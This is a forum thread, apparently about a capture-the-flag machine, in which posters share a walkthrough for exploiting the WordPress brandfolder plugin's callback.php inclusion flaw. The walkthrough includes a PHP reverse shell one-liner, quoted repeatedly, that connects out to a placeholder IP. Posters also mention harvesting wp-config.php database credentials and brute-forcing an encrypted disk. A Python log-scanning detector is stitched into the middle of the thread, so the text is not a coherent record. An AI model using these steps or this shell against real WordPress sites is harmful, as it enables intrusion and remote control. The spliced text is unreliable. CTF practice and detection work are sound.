Posts: 28 | Threads: 0 | Joined: N/A
August 7, 2022 at 1:34 PM

Can someone explain how he can find the vulnerable plugin? I used nmap and there are a lot of plugins. Did you check every one for vulns? Or is there another way? What was your train of thought when you got access to the local web server?

Posts: 24 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:21 PM

For the user part:
1. Go to the www-data home dir = /var/www/html/logs/uploads/ (this folder is writable for www-data).
2. Then create a new folder, e.g. "mkdir wp".
3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!! name it !!! wp-load.php):
   <?php $sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
4. Also create the directory wp-admin/includes.
5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content:
   <?php echo '123'; ?>
6. Navigate to your browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591

Posts: 24 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:22 PM

> (August 7, 2022, 01:34 PM) m4rsh3ll Wrote:
> Can someone explain how he can find the vulnerable plugin? I used nmap and there are a lot of plugins. Did you check every one for vulns? Or is there another way? What was your train of thought when you got access to the local web server?

Do 'cat /usr/local/sbin/startup.sh' and go to the path you see there.
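An added defender-side example, not part of the thread or of the plugin: a Python scanner that reads combined-format access log lines and flags requests to the brandfolder callback.php whose wp_abspath parameter points anywhere other than the real WordPress root. It assumes the install lives at /opt/site.new (the callback.php path quoted in the thread); the log lines are constructed.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumption: the WordPress install is at /opt/site.new (the callback.php path
# quoted in the thread), so that is the only legitimate wp_abspath value.
WP_ABSPATH = "/opt/site.new"
CALLBACK = "/wp-content/plugins/brandfolder/callback.php"

# Combined-format access log: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_outside_abspath(value: str) -> bool:
    """True when a URL-decoded wp_abspath does not resolve to WP_ABSPATH."""
    # A remote URL, a relative path or any '..' component is anomalous even
    # if normalisation would land back inside the root.
    if "://" in value or ".." in value.split("/"):
        return True
    normalized = posixpath.normpath(value)
    return not normalized.startswith("/") or normalized != WP_ABSPATH

def suspicious_requests(lines):
    """One record per callback.php request whose wp_abspath is foreign."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path != CALLBACK:
            continue
        # parse_qs URL-decodes once; decoding again would invite double-decode bugs.
        for value in parse_qs(url.query).get("wp_abspath", []):
            if is_outside_abspath(value):
                hits.append({"client": client, "time": ts, "method": method,
                             "wp_abspath": value, "status": int(status)})
    return hits

# Constructed sample lines: a benign call, the thread's PoC path, a remote URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Aug/2022:14:21:03 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [07/Aug/2022:14:21:09 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/opt/site.new/ HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Aug/2022:14:22:41 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/ HTTP/1.1" 200 3 "-" "curl/7.81"',
    '10.0.0.9 - - [07/Aug/2022:14:23:02 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=http%3A%2F%2F198.51.100.7%2F HTTP/1.1" 500 0 "-" "curl/7.81"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} wp_abspath={hit['wp_abspath']} status={hit['status']}")
```

The same check applied at the web server or WAF (reject any wp_abspath that is not the configured ABSPATH) is the mitigation the detection mirrors.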
Posts: 213 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:35 PM

> (August 7, 2022, 02:21 PM) fukingfuck Wrote:
> For the user part:
> 1. Go to the www-data home dir = /var/www/html/logs/uploads/ (this folder is writable for www-data).
> 2. Then create a new folder, e.g. "mkdir wp".
> 3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!! name it !!! wp-load.php):
>    <?php $sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
> 4. Also create the directory wp-admin/includes.
> 5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content:
>    <?php echo '123'; ?>
> 6. Navigate to your browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
> If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591

Thanks @farkow and @fukingfuck, finally got the user flag. For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.

Posts: 24 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:39 PM

> (August 7, 2022, 02:21 PM) fukingfuck Wrote:
> For the user part:
> 1. Go to the www-data home dir = /var/www/html/logs/uploads/ (this folder is writable for www-data).
> 2. Then create a new folder, e.g. "mkdir wp".
> 3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!! name it !!! wp-load.php):
>    <?php $sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
> 4. Also create the directory wp-admin/includes.
> 5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content:
>    <?php echo '123'; ?>
> 6. Navigate to your browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
> If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591

TY, this path worked for me vs. using the '/tmp' path :heart:

Posts: 17 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:40 PM

Any hint on the root part?

Posts: 28 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:41 PM

> (August 7, 2022, 02:22 PM) vexxxi Wrote:
>> (August 7, 2022, 01:34 PM) m4rsh3ll Wrote:
>> Can someone explain how he can find the vulnerable plugin? I used nmap and there are a lot of plugins. Did you check every one for vulns? Or is there another way? What was your train of thought when you got access to the local web server?
>
> Do 'cat /usr/local/sbin/startup.sh' and go to the path you see there.

Hmm... nmap showed me 40+ plugins with the script scan, that's why I asked about it.. Thanks, it's much easier than it seemed :) Just check the sources.

Posts: 24 | Threads: 0 | Joined: N/A
August 7, 2022 at 2:50 PM

Found: tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* + creds in wp-config.php

Posts: 70 | Threads: 0 | Joined: N/A
August 7, 2022 at 3:02 PM

> (August 7, 2022, 02:35 PM) Exa Wrote:
>> (August 7, 2022, 02:21 PM) fukingfuck Wrote:
>> For the user part:
>> 1. Go to the www-data home dir = /var/www/html/logs/uploads/ (this folder is writable for www-data).
>> 2. Then create a new folder, e.g. "mkdir wp".
>> 3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!! name it !!! wp-load.php):
>>    <?php $sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
>> 4. Also create the directory wp-admin/includes.
>> 5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content:
>>    <?php echo '123'; ?>
>> 6. Navigate to your browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
>> If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591
>
> Thanks @farkow and @fukingfuck, finally got the user flag. For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.

Anytime! I used /dev/shm. Stuck on the root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself are not applied in the VM and it is not mounted.
// on the other processor, brute forcing :P
----------
Update: a nudge for the root. Actually, I would never have guessed that the method would be brute forcing, but yeah, brute force the encrypted disk when you are at that step :D

Posts: 17 | Threads: 0 | Joined: N/A
August 7, 2022 at 3:19 PM

> (August 7, 2022, 03:02 PM) farkow Wrote:
>> (August 7, 2022, 02:35 PM) Exa Wrote:
>>> (August 7, 2022, 02:21 PM) fukingfuck Wrote:
>>> For the user part:
>>> 1. Go to the www-data home dir = /var/www/html/logs/uploads/ (this folder is writable for www-data).
>>> 2. Then create a new folder, e.g. "mkdir wp".
>>> 3. Now go to /var/www/html/logs/uploads/wp and create a reverse shell (!!! name it !!! wp-load.php):
>>>    <?php $sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
>>> 4. Also create the directory wp-admin/includes.
>>> 5. Now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create the files media.php, file.php, image.php, post.php with the following content:
>>>    <?php echo '123'; ?>
>>> 6. Navigate to your browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
>>> If you want to know what's going on, read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591
>>
>> Thanks @farkow and @fukingfuck, finally got the user flag. For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.
>
> Anytime! I used /dev/shm. Stuck on the root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself are not applied in the VM and it is not mounted.
> // on the other processor, brute forcing :P
> ----------
> Update: a nudge for the root. Actually, I would never have guessed that the method would be brute forcing, but yeah, brute force the encrypted disk when you are at that step :D

I don't understand, what is "brute force the encrypted disk"?